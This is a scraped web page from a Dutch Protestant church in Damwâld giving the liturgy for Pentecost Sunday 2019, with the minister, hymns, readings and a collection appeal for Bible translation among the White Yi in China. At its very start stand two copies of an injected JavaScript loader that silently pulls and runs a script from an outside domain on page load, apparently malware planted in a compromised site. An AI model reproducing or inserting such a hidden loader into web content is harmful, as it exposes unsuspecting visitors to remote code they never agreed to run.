;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 juni 2019 9:30 uur - PKN Damwâld
zondag 9 juni 2019
09:30 uur
Eerste Pinksterdag

Kerkdienst zondag 9 juni 2019 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Foeke Wiegersma
Mededeling:Eerste Pinksterdag
Liturgie
Lied voor de dienst Gezang 242 : 1 en 6
Welkom
We zingen: Psalm 107 : 1 en 9
Stil Gebed, Votum en Groet
We zingen: Elb 426 : 1 en 4
Wetslezing : Galaten 5
We zingen: Gezang 239 : 1, 5 en 6
Gebed
We lezen: Handelingen 2
We zingen: Psalm 80 : 1 en 7
Preek .
We zingen: In vuur en vlam ....
Collecte
Dankzegging en voorbede
Slotlied : Gezang 249 : 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Pinksterzendingscollecte

Pinksterzendingscollecte - Bijbelverspreiding op het Chinese platteland
In de Chinese provincie Yunnan wonen 25 minderheidsgroepen met een eigen taal, waaronder de White Yi. Van de 60.000 mensen die tot deze groep behoren zijn er 40.000 Christen. Veel van hen zijn analfabeet. Voor hun geloof, maar ook voor hun identiteit als minderheid, is het van groot belang dat zij de Bijbel in hun eigen taal kunnen lezen. Kerk in Actie steunt naast een alfabetiseringsprogramma voor de White Yi ook een bijbelvertaling in hun eigen taal. Vijf leden van een lokale gemeente vertalen met elkaar de Bijbel vanuit het Chinees. Het Nieuwe Testament is al klaar, ze werken nu aan het Oude Testament en zijn bij 1 Samuel aangekomen. Met uw bijdrage aan deze collecte maakt u het onder meer mogelijk dat ook de overige boeken van het Oude Testament vertaald worden en steunt u wereldwijd zendingsprojecten van Kerk in Actie.

Tweede collecte: Kerk
Uitganscollecte: Kerk